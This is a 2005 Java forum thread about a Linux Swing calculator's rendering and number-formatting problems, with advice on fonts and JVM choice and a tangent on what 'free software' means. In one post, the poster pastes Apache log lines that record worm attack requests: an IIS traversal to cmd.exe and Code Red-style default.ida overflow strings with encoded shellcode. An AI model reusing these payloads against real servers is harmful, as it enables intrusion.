• Post Reply Bookmark Topic Watch Topic
programming forums Java Mobile Certification Databases Caching Books Engineering Micro Controllers OS Languages Paradigms IDEs Build Tools Frameworks Application Servers Open Source This Site Careers Other Pie Elite all forums
this forum made possible by our volunteer staff, including ...
Marshals:
  • Campbell Ritchie
  • Jeanne Boyarsky
  • Ron McLeod
  • Paul Clapham
  • Liutauras Vilda
Sheriffs:
  • paul wheaton
  • Rob Spoor
  • Devaka Cooray
Saloon Keepers:
  • Stephan van Hulst
  • Tim Holloway
  • Carey Brown
  • Frits Walraven
  • Tim Moores
Bartenders:
  • Mikalai Zaikin

Linux SWING Calculator is Small GUI bad

Greenhorn
  • Mark post as helpful
  • send pies
    Number of slices to send:
    Optional 'thank-you' note:
  • Report post to moderator
hello! Here's my updated source (always uptodate! Like CVS):
http://69.29.251.158/indexer/index.php?path=Z_Tree/Blazatz/ProCalculator

Calculator.java:
http://69.29.251.158/indexer/highlight.php?path=Z_Tree/Blazatz/ProCalculator/Calculator.java

CalculatorEngine.java:
http://69.29.251.158/indexer/highlight.php?path=Z_Tree/Blazatz/ProCalculator/CalculatorEngine.java

And here's the real problem visually:

Could you tell me what I'm doing wrong

The original source is from here, and it does the same thing:
http://www.janeg.ca/projects/calc/calc.html

[ EJFH: Toned down the profanity a bit. ]

[ January 31, 2005: Message edited by: Ernest Friedman-Hill ]
[ January 31, 2005: Message edited by: Corey Hollaway ]

Ranch Hand
  • Mark post as helpful
  • send pies
Your means of addressing your computer (and the Java compiler and runtime) needs a major workover.
While they do sometimes respond to threats of violence by working as you expect them to, insults and swearwords are just met with stubborn insistence on doing things in ways you definitely do NOT like.

In that they're exactly the same as people of flesh and blood.

Corey Hollaway
Greenhorn
  • Mark post as helpful
  • send pies
Hey buddy, I know how to work with programs, you just have to keep swearing at it until it works! It's the professional way to get things done.

author and iconoclast
Mac OS X Eclipse IDE Chrome
  • Mark post as helpful
  • send pies
Hi,

Welcome to JavaRanch!

First, a bit of business: you may not have read our naming policy on the way in. It reqiures that you use a full, real (sounding) first and last name for your display name. Initials aren't enough. You can change your display name here. Thanks!

Second, Jeroen's right about the language; furthermore, we try to run a G-rated Ranch, so we'd appreciate it if you'd respect that. There's young'uns about!

Finally, you didn't actually paste both classes into your message, but two copies of the second one. If I look at the image, I can see you're on Linux, and getting some GTK errors, and if I look at the missing source file, I can see it explicitly asks for the Microsoft-only "Arial" font; maybe your X font server is returning something bogus for Arial? Try changing the source to not request any font at all, so that the default is used.

Corey Hollaway
Greenhorn
  • Mark post as helpful
  • send pies
You guys are nice . You were right about the image, I changed it so it isn't too bad. But now I'm having issues with the Decimal Formatter.

Whenever I go like this:

I get this:
I don't think is is normal, Java hates me! Ggrraa! (starts swearing again)

Corey Hollaway
Greenhorn
  • Mark post as helpful
  • send pies
OMG you guys are freakin' nuts!!! My Apache access log:

24.150.41.84 - - [31/Jan/2005:04:58:03 -0800] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" "-"
69.29.211.61 - - [31/Jan/2005:05:08:43 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271 "-" "-" "-"
69.29.206.36 - - [30/Jan/2005:10:48:11 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271 "-" "-" "-"
69.134.118.15 - - [30/Jan/2005:07:10:36 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 271 "-" "-" "-"
[ January 31, 2005: Message edited by: Corey Hollaway ]

Corey Hollaway
Greenhorn
  • Mark post as helpful
  • send pies
Wait nevermind I'm pathetic, I forgot to look at the dates....but anyways, here are the new links:

http://69.29.236.43/indexer/index.php?path=Z_Tree/Blazatz/ProCalculator
The Problem I had Before but Was Resolved

Ernest Friedman-Hill
author and iconoclast
Mac OS X Eclipse IDE Chrome
  • Mark post as helpful
  • send pies
No, it's definitely not normal. But this:

tells me you're not using Sun's JVM, but gcj or Kaffe or some other third-party Java implementation. I'm actually big free-software supporter, but the honest truth is that no free Java implementation is even close to working yet. Do yourself a favor and uninstall it and then install Sun's Linux JDK from http://java.sun.com. It will save you many headaches.

Ranch Hand
  • Mark post as helpful
  • send pies

Originally posted by Ernest Friedman-Hill:
No, it's definitely not normal. But this:

tells me you're not using Sun's JVM, but gcj or Kaffe or some other third-party Java implementation. I'm actually big free-software supporter, but the honest truth is that no free Java implementation is even close to working yet. Do yourself a favor and uninstall it and then install Sun's Linux JDK from http://java.sun.com. It will save you many headaches.

The last I check Sun's JDK is free (in the sense that you don't have to pay for it). :roll: I sure wish everyone would agree on terminology. I think in this case by "free software" you mean (more or less) "open source software". Anyways, I'm probably just nit-picking

Corey Hollaway
Greenhorn
  • Mark post as helpful
  • send pies
I love you guys! Thanks for clearing things up Layne . I remember coming to these boards a lot about 6 months or so ago. I just want to say you guys are so awesome. I really loved these forums, and it's absolute genious that the only rule is to be 'nice', that's so cool. I just want to also say that your answers Ernest were absolutely perfect, I would elect you to be the president of the united states and then only have one amendment in the constition "be nice" lol. Peace out.

Ranch Hand
  • Mark post as helpful
  • send pies

Originally posted by Layne Lund:
I sure wish everyone would agree on terminology.

We did. We just didn't agree on the terminology you seem to prefer. The real problem is that English uses the same word for free and free -- oh, I mean for "no cost" and "having freedom." Spanish, for example, has "gratis" and "libre."

You could always try to get FLOSS more widely accepted, but I think that's an uphill battle.

Jeroen Wenting
Ranch Hand
  • Mark post as helpful
  • send pies
Well, the Sun reference implementation gives you quite a bit of freedom as to how you use it.
You're even free to propose changes to it.

You're just not free to modify it yourself and release it, or to implement something that isn't compatible to it and call it the same.

In the same way you're free to own a kitchen knife but not free to stick it into somebody. Yet the open source advocates (ok, most of them) don't complain about that...

Consider Paul's rocket mass heater.
    Bookmark Topic Watch Topic